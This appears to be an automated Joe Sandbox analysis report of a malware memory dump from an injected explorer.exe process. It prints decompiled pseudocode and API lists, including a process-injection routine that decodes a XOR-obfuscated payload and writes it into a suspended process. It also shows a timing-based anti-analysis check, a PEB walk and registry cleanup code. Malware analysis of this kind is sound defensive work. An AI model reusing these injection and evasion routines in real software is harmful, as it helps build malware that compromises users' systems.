    • CryptReleaseContext.ADVAPI32(?,?), ref: 007C1B3E
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C1AF8, Relevance: 1.5, APIs: 1, Instructions: 16encryption
    C-Code - Quality: 100%
    			E007C1AF8(long* __eax) {
				long* _v8;
				int _v12;

				_v8 = __eax;
				if( *((char*)( *0x7cb508)) != 0xe9) {
					_v12 = CryptDestroyKey(_v8);
				}
				return _v12;
			}





    0x007c1afe
    0x007c1b09
    0x007c1b15
    0x007c1b15
    0x007c1b1e

    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 007C1B0F
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C14D0, Relevance: 1.5, APIs: 1, Instructions: 16encryption
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 007C14E7
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C6B18, Relevance: .0, Instructions: 32
    C-Code - Quality: 65%
    			E007C6B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;

				_v24 = __eax;
				asm("rdtsc");
				_v12 = __eax;
				_v8 = __edx;
				asm("cpuid");
				asm("rdtsc");
				_v20 = 0;
				_v16 = __edx;
				 *((intOrPtr*)(_v24 + 4)) = _v16;
				 *_v24 = _v20;
				return E007C6A38(_v24,  &_v12);
			}








    0x007c6b1e
    0x007c6b25
    0x007c6b27
    0x007c6b2a
    0x007c6b2f
    0x007c6b31
    0x007c6b33
    0x007c6b36
    0x007c6b43
    0x007c6b4c
    0x007c6b5c

    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C9178, Relevance: .0, Instructions: 22
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C24F8, Relevance: .0, Instructions: 22
    C-Code - Quality: 100%
    			E007C24F8() {
				intOrPtr _v8;
				intOrPtr* _t10;

				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				do {
					_t10 =  *_t10;
				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
				_v8 =  *((intOrPtr*)(_t10 + 8));
				return _v8;
			}





    0x007c2509
    0x007c250c
    0x007c250c
    0x007c2511
    0x007c251d
    0x007c2528

    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C9147, Relevance: .0, Instructions: 21
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C5028, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 215threadprocessfile
    C-Code - Quality: 98%
    			E007C5028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t144;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E007C12DC(_a16) + 1;
				}
				E007C1258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L22:
					return _v8;
				}
				E007C1164(E007C10B4(_t109, 0x44),  &_v353);
				E007C133C( &_v353, "_section");
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
				_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
				_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
				E007C12B8(_v16, _v24, _a8);
				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
				E007C12B8(_v16 + _v24 + 8, _a20, _a16);
				_v24 = 0x29b;
				E007C13B4( &_v28, _v24 + 0x11);
				E007C12B8(_v28, _v24, 0x7ca2ac);
				_t144 = _v24 - 1;
				if(_t144 < 0) {
					L9:
					_v20 = E007C12DC( &_v353) + 1;
					E007C12B8(_v28 + _v24, _v20,  &_v353);
					_v24 = _v24 + _v20;
					_v40 = 0;
					_v40 = E007C4EF0(_v332.ExtendedRegisters.hProcess, _t224);
					if(_v40 == 0) {
						E007C1258( &_v332, 0xcc);
						_v332.ContextFlags = 0x10007;
						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
							_v40 = _v332.Eax;
						}
					}
					_t228 = _v40;
					if(_v40 == 0) {
						_v40 = E007C4DE0(_v332.ExtendedRegisters.hProcess, _t228);
					}
					if(_v40 != 0) {
						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
						E007C1828(_v28);
						ResumeThread(_v124);
						if(_a24 == 0) {
							__eflags = 0;
							_v8 = 0;
						} else {
							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
								_v8 = 0xfffffffe;
							} else {
								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
							}
						}
						CloseHandle(_v124);
						CloseHandle(_v332.ExtendedRegisters);
					}
					goto L22;
				}
				_v44 = _t144 + 1;
				_v32 = 0;
				do {
					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
					_v32 = _v32 + 1;
					_t55 =  &_v44;
					 *_t55 = _v44 - 1;
					_t224 =  *_t55;
				} while ( *_t55 != 0);
				goto L9;
			}



















    0x007c5031
    0x007c503c
    0x007c5046
    0x007c5046
    0x007c504d
    0x007c505e
    0x007c505e
    0x007c5069
    0x007c506e
    0x007c508f
    0x007c5097
    0x007c5099
    0x007c509d
    0x007c52ce
    0x007c52d4
    0x007c52d4
    0x007c50ae
    0x007c50bf
    0x007c50d9
    0x007c50fb
    0x007c5113
    0x007c511f
    0x007c5130
    0x007c513e
    0x007c514f
    0x007c5154
    0x007c5164
    0x007c5174
    0x007c517c
    0x007c517f
    0x007c51a5
    0x007c51b1
    0x007c51c3
    0x007c51cb
    0x007c51d0
    0x007c51db
    0x007c51e2
    0x007c51ef
    0x007c51f4
    0x007c5211
    0x007c5222
    0x007c5222
    0x007c5211
    0x007c5225
    0x007c5229
    0x007c5233
    0x007c5233
    0x007c523a
    0x007c5252
    0x007c526c
    0x007c5275
    0x007c527e
    0x007c5288
    0x007c52b5
    0x007c52b7
    0x007c528a
    0x007c529a
    0x007c52ac
    0x007c529c
    0x007c52a4
    0x007c52a4
    0x007c529a
    0x007c52be
    0x007c52c8
    0x007c52c8
    0x00000000
    0x007c523a
    0x007c5182
    0x007c5185
    0x007c518c
    0x007c519a
    0x007c519d
    0x007c51a0
    0x007c51a0
    0x007c51a0
    0x007c51a0
    0x00000000

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
    • CloseHandle.KERNEL32(?), ref: 007C52C8
      • Part of subcall function 007C4DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ResumeThread.KERNEL32(?), ref: 007C527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
    • CloseHandle.KERNEL32(?), ref: 007C52BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C5026, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212threadprocessfile
    C-Code - Quality: 98%
    			E007C5026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t144;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E007C12DC(_a16) + 1;
				}
				E007C1258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L23:
					return _v8;
				} else {
					E007C1164(E007C10B4(_t109, 0x44),  &_v353);
					E007C133C( &_v353, "_section");
					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
					_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
					_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
					E007C12B8(_v16, _v24, _a8);
					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
					E007C12B8(_v16 + _v24 + 8, _a20, _a16);
					_v24 = 0x29b;
					E007C13B4( &_v28, _v24 + 0x11);
					E007C12B8(_v28, _v24, 0x7ca2ac);
					_t144 = _v24 - 1;
					if(_t144 < 0) {
						L10:
						_v20 = E007C12DC( &_v353) + 1;
						E007C12B8(_v28 + _v24, _v20,  &_v353);
						_v24 = _v24 + _v20;
						_v40 = 0;
						_v40 = E007C4EF0(_v332.ExtendedRegisters.hProcess, _t229);
						if(_v40 == 0) {
							E007C1258( &_v332, 0xcc);
							_v332.ContextFlags = 0x10007;
							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
								_v40 = _v332.Eax;
							}
						}
						_t233 = _v40;
						if(_v40 == 0) {
							_v40 = E007C4DE0(_v332.ExtendedRegisters.hProcess, _t233);
						}
						if(_v40 != 0) {
							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
							E007C1828(_v28);
							ResumeThread(_v124);
							if(_a24 == 0) {
								__eflags = 0;
								_v8 = 0;
							} else {
								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
									_v8 = 0xfffffffe;
								} else {
									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
								}
							}
							CloseHandle(_v124);
							CloseHandle(_v332.ExtendedRegisters);
						}
						goto L23;
					}
					_v44 = _t144 + 1;
					_v32 = 0;
					do {
						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
						_v32 = _v32 + 1;
						_t55 =  &_v44;
						 *_t55 = _v44 - 1;
						_t229 =  *_t55;
					} while ( *_t55 != 0);
					goto L10;
				}
			}



















    0x007c5031
    0x007c503c
    0x007c5046
    0x007c5046
    0x007c504d
    0x007c505e
    0x007c505e
    0x007c5069
    0x007c506e
    0x007c508f
    0x007c5097
    0x007c5099
    0x007c509d
    0x007c52ce
    0x007c52d4
    0x007c50a3
    0x007c50ae
    0x007c50bf
    0x007c50d9
    0x007c50fb
    0x007c5113
    0x007c511f
    0x007c5130
    0x007c513e
    0x007c514f
    0x007c5154
    0x007c5164
    0x007c5174
    0x007c517c
    0x007c517f
    0x007c51a5
    0x007c51b1
    0x007c51c3
    0x007c51cb
    0x007c51d0
    0x007c51db
    0x007c51e2
    0x007c51ef
    0x007c51f4
    0x007c5211
    0x007c5222
    0x007c5222
    0x007c5211
    0x007c5225
    0x007c5229
    0x007c5233
    0x007c5233
    0x007c523a
    0x007c5252
    0x007c526c
    0x007c5275
    0x007c527e
    0x007c5288
    0x007c52b5
    0x007c52b7
    0x007c528a
    0x007c529a
    0x007c52ac
    0x007c529c
    0x007c52a4
    0x007c52a4
    0x007c529a
    0x007c52be
    0x007c52c8
    0x007c52c8
    0x00000000
    0x007c523a
    0x007c5182
    0x007c5185
    0x007c518c
    0x007c519a
    0x007c519d
    0x007c51a0
    0x007c51a0
    0x007c51a0
    0x007c51a0
    0x00000000
    0x007c518c

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 007C5040
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 007C508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007C50F5
    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 007C510D
      • Part of subcall function 007C13B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007C13CD
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
      • Part of subcall function 007C4EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 007C5209
    • CloseHandle.KERNEL32(?), ref: 007C52C8
      • Part of subcall function 007C4DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 007C4E09
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E39
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E5A
      • Part of subcall function 007C4DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4E7E
    • VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 007C5252
    • WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 007C526C
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ResumeThread.KERNEL32(?), ref: 007C527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C5292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 007C52A4
    • CloseHandle.KERNEL32(?), ref: 007C52BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C80C0, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100window
    C-Code - Quality: 90%
    			E007C80C0(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t63;

				_v8 = __eax;
				if( *0x7ca038 != 0) {
					_t50 =  *0x7ca038; // 0x0
					 *0x7cb4f8(_t50);
				}
				 *0x7cc24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x7ca29c = 0xffffffff;
				_t13 =  *0x7cc24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x7cc24c; // 0x0
				CloseHandle(_t15);
				E007C1308( &_v265, 0x7cb518);
				 *((char*)(_t63 + E007C12DC(0x7cb518) - 0x109)) = 0;
				E007C133C( &_v265, ".lnk");
				E007C471C( &_v265, 0, 0);
				E007C471C(0x7cb518, 0x7530, 0xffffffff);
				if( *0x7ca574 != 0) {
					_t48 =  *0x7ca574; // 0x60258
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x7ca034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x7ca260; // 0x7c21a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000001, 0x7cb752, _t60);
					}
					E007C4A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x7ca260; // 0x7c21a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000002, 0x7cb752, _t62);
					}
					E007C4A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x7cb510; // 0x490000
				E007C1828(_t31);
				_t33 =  *0x7ca054; // 0x228
				ReleaseMutex(_t33);
				_t35 =  *0x7ca054; // 0x228
				CloseHandle(_t35);
				_t37 =  *0x7ca2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}



















    0x007c80c9
    0x007c80d3
    0x007c80d5
    0x007c80db
    0x007c80db
    0x007c80ef
    0x007c80f4
    0x007c8100
    0x007c8106
    0x007c810c
    0x007c8112
    0x007c8123
    0x007c8132
    0x007c8146
    0x007c8158
    0x007c816a
    0x007c8176
    0x007c817e
    0x007c8184
    0x007c8184
    0x007c8191
    0x007c81d7
    0x007c81f0
    0x007c81fb
    0x007c81d9
    0x007c81de
    0x007c81e9
    0x007c81e9
    0x007c820c
    0x007c8193
    0x007c8197
    0x007c81b0
    0x007c81bb
    0x007c8199
    0x007c819e
    0x007c81a9
    0x007c81a9
    0x007c81cc
    0x007c81cc
    0x007c8211
    0x007c8216
    0x007c821b
    0x007c8221
    0x007c8227
    0x007c822d
    0x007c8233
    0x007c823a
    0x007c823c
    0x007c8240
    0x007c8244
    0x007c8244
    0x007c824d

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
    • CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
    • SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
    • SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
    • ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ReleaseMutex.KERNEL32(00000228), ref: 007C8221
    • CloseHandle.KERNEL32(00000228), ref: 007C822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C80BE, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 80window
    C-Code - Quality: 90%
    			E007C80BE(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t64;
				void* _t66;

				_t64 = _t66;
				_v8 = __eax;
				if( *0x7ca038 != 0) {
					_t50 =  *0x7ca038; // 0x0
					 *0x7cb4f8(_t50);
				}
				 *0x7cc24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x7ca29c = 0xffffffff;
				_t13 =  *0x7cc24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x7cc24c; // 0x0
				CloseHandle(_t15);
				E007C1308( &_v265, 0x7cb518);
				 *((char*)(_t64 + E007C12DC(0x7cb518) - 0x109)) = 0;
				E007C133C( &_v265, ".lnk");
				E007C471C( &_v265, 0, 0);
				E007C471C(0x7cb518, 0x7530, 0xffffffff);
				if( *0x7ca574 != 0) {
					_t48 =  *0x7ca574; // 0x60258
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x7ca034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x7ca260; // 0x7c21a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000001, 0x7cb752, _t60);
					}
					E007C4A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x7ca260; // 0x7c21a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x7ca260; // 0x7c21a4
						E007C8064(0x80000002, 0x7cb752, _t62);
					}
					E007C4A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x7cb510; // 0x490000
				E007C1828(_t31);
				_t33 =  *0x7ca054; // 0x228
				ReleaseMutex(_t33);
				_t35 =  *0x7ca054; // 0x228
				CloseHandle(_t35);
				_t37 =  *0x7ca2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}




















    0x007c80c1
    0x007c80c9
    0x007c80d3
    0x007c80d5
    0x007c80db
    0x007c80db
    0x007c80ef
    0x007c80f4
    0x007c8100
    0x007c8106
    0x007c810c
    0x007c8112
    0x007c8123
    0x007c8132
    0x007c8146
    0x007c8158
    0x007c816a
    0x007c8176
    0x007c817e
    0x007c8184
    0x007c8184
    0x007c8191
    0x007c81d7
    0x007c81f0
    0x007c81fb
    0x007c81d9
    0x007c81de
    0x007c81e9
    0x007c81e9
    0x007c820c
    0x007c8193
    0x007c8197
    0x007c81b0
    0x007c81bb
    0x007c8199
    0x007c819e
    0x007c81a9
    0x007c81a9
    0x007c81cc
    0x007c81cc
    0x007c8211
    0x007c8216
    0x007c821b
    0x007c8221
    0x007c8227
    0x007c822d
    0x007c8233
    0x007c823a
    0x007c823c
    0x007c8240
    0x007c8244
    0x007c8244
    0x007c824d

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007C80DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007C80E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C8106
    • CloseHandle.KERNEL32(00000000), ref: 007C8112
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
    • SendMessageA.USER32(00060258,00000010,00000000,00000000), ref: 007C8184
    • ExitProcess.KERNEL32 ref: 007C8244
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • SHDeleteKeyA.SHLWAPI(80000002,007C21A4), ref: 007C81BB
    • SHDeleteKeyA.SHLWAPI(80000001,007C21A4), ref: 007C81FB
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • ReleaseMutex.KERNEL32(00000228), ref: 007C8221
    • CloseHandle.KERNEL32(00000228), ref: 007C822D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    Function 007C41CC, Relevance: 15.1, APIs: 10, Instructions: 88thread
    C-Code - Quality: 100%
    			E007C41CC() {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t51;

				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E007C13DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x7ca2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t51 =  *_v16 - 1;
						if(_t51 >= 0) {
							_v36 = _t51 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L10;
							}
							_v5 = 1;
						}
						L10:
						FreeSid(_v24);
					}
					E007C1440(_v16);
				}
				return _v5;
			}












    0x007c41d2
    0x007c41eb
    0x007c41f2
    0x007c4214
    0x007c4214
    0x007c421b
    0x007c422b
    0x007c4247
    0x007c424e
    0x007c4258
    0x007c4278
    0x007c4283
    0x007c4286
    0x007c4289
    0x007c428c
    0x007c4293
    0x007c42b2
    0x007c42b5
    0x007c42b5
    0x007c42b8
    0x00000000
    0x00000000
    0x00000000
    0x007c42b8
    0x007c42ac
    0x007c42ac
    0x007c42ba
    0x007c42be
    0x007c42be
    0x007c42c7
    0x007c42c7
    0x007c42d2

    APIs
    • GetCurrentThread.KERNEL32 ref: 007C41DE
    • OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
    • GetLastError.KERNEL32 ref: 007C41F4
    • GetCurrentProcess.KERNEL32 ref: 007C4207
    • OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
